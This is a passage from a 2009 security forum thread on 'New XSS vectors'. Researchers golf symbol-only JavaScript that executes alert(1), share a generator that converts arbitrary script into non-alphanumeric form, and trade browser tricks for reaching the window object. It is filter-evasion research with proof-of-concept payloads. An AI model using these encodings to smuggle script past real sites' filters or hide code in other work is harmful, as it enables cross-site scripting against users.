Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...678910111213141516Next
Current Page: 15 of 16
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 02, 2009 06:32AM

Updated it to be shorter

$=[][(!~''+'')[(+!'')+(+!'')+(+!'')]+({}+'')[+!'']+($$=(!+''+'')[+!''])+(_=(!''+'')[+''])],$()[(!!''+'')[+!'']+(!!''+'')[+!''+!'']+(!!''+'')[+!''+!''+!''+!'']+$$+_](+!'')

Hit execute output for demo

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#JD1bXVsoIX4nJysnJylbKCshISckJykrKCshISckJykrKCshISckJyldKyh7fSsnJylbKyEhJyQnXSsoPEBmcm9tY2hhcmNvZGVzXzA%2BMTAwMTxAL2Zyb21jaGFyY29kZXNfMD49KCErJycrJycpWyshISckJ10pKyhfPSghJycrJycpWysnJ10pXSwkKClbKCEhJycrJycpWyshISckJ10rKCEhJycrJycpWyshISckJyshISckJ10rKCEhJycrJycpWyshISckJyshISckJyshISckJyshISckJ10rPEBmcm9tY2hhcmNvZGVzXzE%2BMTAwMTxAL2Zyb21jaGFyY29kZXNfMT4rX10oKyEhJyQnKQ%3D%3D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 8 time(s). Last edit at 06/02/2009 09:52AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 02, 2009 08:48AM

Andrea Giammarchi came up with this cross browser xD :-

$=''|'',_=$+!"",__=_+_,___=__+_,($)[_$=($$=(_$=""+{})[__+__+_])+_$[_]+(""+_$[-__])[_]+(""+!_)[___]+($_=(_$=""+!$)[$])+_$[_]+_$[__]+$$+$_+(""+{})[_]+_$[_]][_$]((_$=""+!_)[_]+_$[__]+_$[__+__]+(_$=""+!$)[_]+_$[$]+"("+_+")")();

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 02, 2009 03:44PM

Yosuke HASEGAWA has his own Hackvertor tag. Yes Hackvertor now generates non-ascii code. Thanks to sdc for helping with the concept and providing some nice shortcuts for the numbers.

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBoYXNlZ2F3YV8wPmFsZXJ0KDEpPEAvaGFzZWdhd2FfMD4%3D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 02, 2009 10:35PM

then I realized that the numbers could be shortened another 2 bytes.. 1=3/3, so you can do 1 with $/$ haha.. so well..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 03, 2009 03:56AM

ok, I've modified gareth's function to a simplified one..

this one should create smaller output code (hackvertors does Function("return char")() for each letter.. and that makes source code toooo large).

function toNonAscii(str){return "$$=-~-~[],$=-~$$,$$$$=$$<<$$,$$$=$$$$+~[];$$$$$=($-$)[$$$$$$=(''+{})[$$+$]+(''+{})[$-$$]+([].$+'')[$-$$]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-$$]+(!''+'')[$$]+(''+{})[$$+$]+({}+'')[$+$]+(''+{})[$-$$]+(!''+'')[$-$$]][$$$$$$];$$$$$$='\\\\'+(!''+'')[$$]+($-$)+($-$);$$$$$$$=''+(!''+'')[$/$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+(!''+'')[$/$]+([].$+'')[$/$];$$$$$($$$$$($$$$$$$+$$$$$($$$$$$$+'\\''+$$$$$$+$$+($-$)+$$$$$$+($$+$)+$+(!''+'')[$-$]+(!''+'')[$/$]+$$$$$$+($+$)+($*$)+([].$+'')[$/$]+$$$$$$+($+$)+$$$+$$$$$$+$$+(!''+'')[$]+$$$$$$+($+$)+($+$)+(!''+'')[$/$]+$$$$$$+($+$)+(![]+'')[$-$]+$$$$$$+($+$)+([].$+'')[$$]+$$$$$$+($$+$$)+$+$$$$$$+($+$)+($$$$)+$$$$$$+($+$)+($/$)+(!''+'')[$/$]+$$$$$$+($$+$$)+$+$$$$$$+($+$)+(![]+'')[$-$]+$$$$$$+($+$)+($$+$$)+(!''+'')[$]+'\\'')())()("+str.replace(/./g,function(c){return ",''"+(""+c.charCodeAt()).replace(/./g,function(d){return "+"+["($-$)","$/$","$$","$","$$*$$","($$+$)","$*$$","$$$","$$$$","$*$"][d];})}).slice(1)+"))();";}

try..

toNonAscii('alert("cool code")');

creates:

$$=-~-~[],$=-~$$,$$$$=$$<<$$,$$$=$$$$+~[];$$$$$=($-$)[$$$$$$=(''+{})[$$+$]+(''+{})[$-$$]+([].$+'')[$-$$]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-$$]+(!''+'')[$$]+(''+{})[$$+$]+({}+'')[$+$]+(''+{})[$-$$]+(!''+'')[$-$$]][$$$$$$];$$$$$$='\\'+(!''+'')[$$]+($-$)+($-$);$$$$$$$=''+(!''+'')[$/$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+(!''+'')[$/$]+([].$+'')[$/$];$$$$$($$$$$($$$$$$$+$$$$$($$$$$$$+'\''+$$$$$$+$$+($-$)+$$$$$$+($$+$)+$+(!''+'')[$-$]+(!''+'')[$/$]+$$$$$$+($+$)+($*$)+([].$+'')[$/$]+$$$$$$+($+$)+$$$+$$$$$$+$$+(!''+'')[$]+$$$$$$+($+$)+($+$)+(!''+'')[$/$]+$$$$$$+($+$)+(![]+'')[$-$]+$$$$$$+($+$)+([].$+'')[$$]+$$$$$$+($$+$$)+$+$$$$$$+($+$)+($$$$)+$$$$$$+($+$)+($/$)+(!''+'')[$/$]+$$$$$$+($$+$$)+$+$$$$$$+($+$)+(![]+'')[$-$]+$$$$$$+($+$)+($$+$$)+(!''+'')[$]+'\'')())()(''+$*$+$$$,''+$/$+($-$)+$$$$,''+$/$+($-$)+$/$,''+$/$+$/$+$$*$$,''+$/$+$/$+$*$$,''+$$*$$+($-$),''+$+$$*$$,''+$*$+$*$,''+$/$+$/$+$/$,''+$/$+$/$+$/$,''+$/$+($-$)+$$$$,''+$+$$,''+$*$+$*$,''+$/$+$/$+$/$,''+$/$+($-$)+($-$),''+$/$+($-$)+$/$,''+$+$$*$$,''+$$*$$+$/$,''+($$+$)+$*$))();

and hackvertor makes:

$$=-~-~[],$=-~$$,$$$$=$$<<$$,$$$=$$$$+~[];$$$$$=($-$)[$$$$$$=(''+{})[$$+$]+(''+{})[$-$$]+([].$+'')[$-$$]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-$$]+(!''+'')[$$]+(''+{})[$$+$]+({}+'')[$+$]+(''+{})[$-$$]+(!''+'')[$-$$]][$$$$$$];$$$$$($$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($-$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$+$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($$+$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($+$)+($$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($+$)+($$+$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$)+($-$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$$)+($$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$+$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$$)+($-$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($$+$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($$+$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$$)+($$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$)+($-$$)+'\'')())()

so well.. :P its important to say that if you want the last call to return something, you have to do: "return 1;" so for example.

eval(toNonAscii("return alert"))('123');

alerts 123

so well.. HASEGAWA is my new god I think..

Greetz!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 06/03/2009 03:57AM by sirdarckcat.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 04:06AM

Mine is more confusing :)

Maybe we should have two tags...

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 06/03/2009 04:07AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 04:35AM

I dunno why but I just realized that Hackvertor can double/triple... encode the non-alpha code generation haha

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBoYXNlZ2F3YV8xPjxAaGFzZWdhd2FfMD5hbGVydCgiTE9MISIpPEAvaGFzZWdhd2FfMD48QC9oYXNlZ2F3YV8xPg%3D%3D

good luck decoding that

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: holiman
Date: June 03, 2009 05:06AM

> -----------------------------
> _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;__
> ___=__+___;$$=({}+"")[_____]+
> ({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+
> "")[$]+(($==$)+"")[_]+(($==$)
> +"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+
> (($==$)+"")[_];$$$=(($!=$)+""
> )[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[
> _]+(($==$)+"")[$];$_$=({}+"")
> [_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+
> "")[__+_____]+({}+"")[_____]+
> ({}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___];
> ($)[$$][$$]($$$+"('"+$_$+"')")();


Wow. Me too stupid. Could anyone pls explain that ^^ ?

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 03, 2009 08:32AM

@holiman: It looks complicated but is actually very easy. Since you are not allowed to use alnum characters you have to generate them.

_=''+{}

The code above for example results in the string [object Object]. Now you can access the string like an array.

_[1]
//<- gives you an o, index 2 a b, 3 a j etc etc.

Since the 1 is not allowed too you have to generate it as well. $>>$ for example will give you a 0, $++ a 1, $+$ afterwards a two and so on. With some patience you can assemble the string 'alert(1)' using this way. Last but not least you have to evaluate the string. One way to do this w/o alnum would be to create the string __parent__ and use it as array index for one of the variables you created before. Boom - you have the window object and thus the ability to eval().

See - easy :)

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 08:41AM

mine and sdc method uses Function to generate any characters. We return octal escaped strings to get the char we want and pass numbers to it.

e.g.
new Function("return '\141'")();

Which returns "a", we have to generate the constructor first in order to get the Function. Like so:-
(0).constructor.constructor == Function

So you use mario's explanation to generate each char like "c", "o" etc then instead of returning \141 you just make the numbers using the technique.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 03, 2009 08:55AM

@Gareth The constructor trick is damn cool!

(0).constructor.constructor('return alert("\141")')()

Too bad the p is hard to generate using my way because _['__parent__']['alert'](1) would have been a very short way to do the alert :)



Edited 1 time(s). Last edit at 06/03/2009 09:01AM by .mario.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: June 03, 2009 08:57AM

Too bad these do not seem to work in IE 7.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 09:01AM

@matt

yeah I had this discussion with someone else :(
String indexes are the problem.

BTW IE8 earlier versions didn't have string indexing. So some versions of IE8 won't work with it either.

@mario

Yeah it rocks :) especially concatenating strings of numbers to generate chars haha

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 06/03/2009 09:08AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Date: June 03, 2009 09:40AM

Thanks all.
I'm unduly impressed for Hackvertor.

Next story is character encoding polyglot javascript.

The script source is here: http://utf-8.jp/joke/detectenc.js.txt

The detectCharSet() function solves charset of itself.

For example, the code like as following shows "UTF-8".
<script src="detectenc.js.txt" charset="utf-8"></script>
<script>
alert( detectCharSet() );
</script>

And the code like as following shows "Shift_JIS".
<script src="detectenc.js.txt" charset="Shift_JIS"></script>
<script>
alert( detectCharSet() );
</script>

Of course, UTF-7 we love is also supported.
<script src="detectenc.js.txt" charset="UTF-7"></script>
<script>
alert( detectCharSet() );
</script>

demo page to execute this script is here.
http://utf-8.jp/joke/detectenc.html

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 10:31AM

o=({'*':1,'@$':1,'@*':1});
alert(o.*+o.@$+o.@*)

and...

Number.prototype['*']=function(str) {
alert(str);
}
1..*(1)

OR
.1.*(1)

haha

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 06/03/2009 10:48AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: June 04, 2009 12:48AM

@Gareth:

Made this one a little smaller for you

Yours:
$=[][(!~''+'')[(+!'')+(+!'')+(+!'')]+({}+'')[+!'']+($$=(!+''+'')[+!''])+(_=(!''+'')[+''])],$()[(!!''+'')[+!'']+(!!''+'')[+!''+!'']+(!!''+'')[+!''+!''+!''+!'']+$$+_](+!'') - 170 chars

Mine:
$=[];$=[][(!$+'')[-~-~-~[]]+({}+'')[+!'']+ ($$=(!''+'')[+!'']) + (_=(!+''+'')[+''])],$()
[(!$+'')[+!'']+(!$+'')[-~-~[]]+(!''+'')[-~-~-~[]]+$$+_](+!'') - 150 chars

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 02:34AM

@matt

sweet now I wonder if I can make it smaller :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 03:01AM

$=[];$=[][(!$+'')[-~-~-~$]+({}+$)[+!'']+($$=(!''+$)[+!''])+(_=(!+$+$)[+$])],$()[(!$+$)[+!'']+(!$+'')[-~-~$]+(!''+'')[-~-~-~$]+$$+_](+!'')

137!

136! LOL

$=[$=[]][(!$+'')[-~-~-~$]+({}+$)[+!'']+($$=(!''+$)[+!''])+(_=(!+$+$)[+$])],$()[(!$+$)[+!'']+(!$+'')[-~-~$]+(!''+'')[-~-~-~$]+$$+_](+!'')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 06/04/2009 04:15AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 04, 2009 03:07AM

gareth, matt:
both of your codes return..
TypeError: $()[(!$ + "")[+ !""] + (!$ + "")[- ~- ~[]] + (!"" + "")[- ~- ~- ~[]] + $$ + _] is not a function

and that makes sense..

[].sort().alert(1)?? wtf?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 03:13AM

@sirdarckcat

Only works in FF and sort gets window :)

x=[].sort,x() === window

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 06/04/2009 03:14AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 04, 2009 03:20AM

ah true.. in firebug you codes dont work hehe... that's why I was confused.

(ohhh you are cheating, using _ matches as a word char..)

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 06/04/2009 03:21AM by sirdarckcat.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 04:01AM

alphanumeric === a-zA-Z0-9

:P

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: June 04, 2009 08:09AM

$=[$=[]][(!$+$)[-~-~-~$]+({}+$)[+!'']+($$=(!''+$)[+!''])+(_=(!+$+$)[+$])],$()[(!$+$)[+!'']+(!$+$)[-~-~$]+(!''+'')[-~-~-~$]+$$+_](+!'') - 134 chars

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 04, 2009 08:13AM

ok, you want to play like that, lets play like that.

$=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+($_)[+$])],$()[(__)[_/_]+(__)[_+~$]+($_)[_]+$$](_/_)

114

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 06/04/2009 08:20AM by sirdarckcat.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: June 04, 2009 08:35AM

Nice.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 09:15AM

Very nice :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 12:02PM

window['Event']['constructor']['__proto__']['__proto__']['__parent__']['_content'].alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 04, 2009 02:31PM

@sdc I did some homework for you :)

$=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])],$()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

or

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

106



Edited 1 time(s). Last edit at 06/04/2009 03:06PM by .mario.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 02:58PM

@mario

That's awesome, I didn't think that would be shortened

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 04:27PM

Ok now I'm cheating :) cheap shot I know. jeez anything to win haha

($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[_/_]+(ª=($_=!''+$)[_/_]+$_[+$])])()[µ[_/_]+µ[_+~$]+$_[_]+ª](_/_)

101!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Pages: PreviousFirst...678910111213141516Next
Current Page: 15 of 16


Sorry, you can't reply to this topic. It has been closed.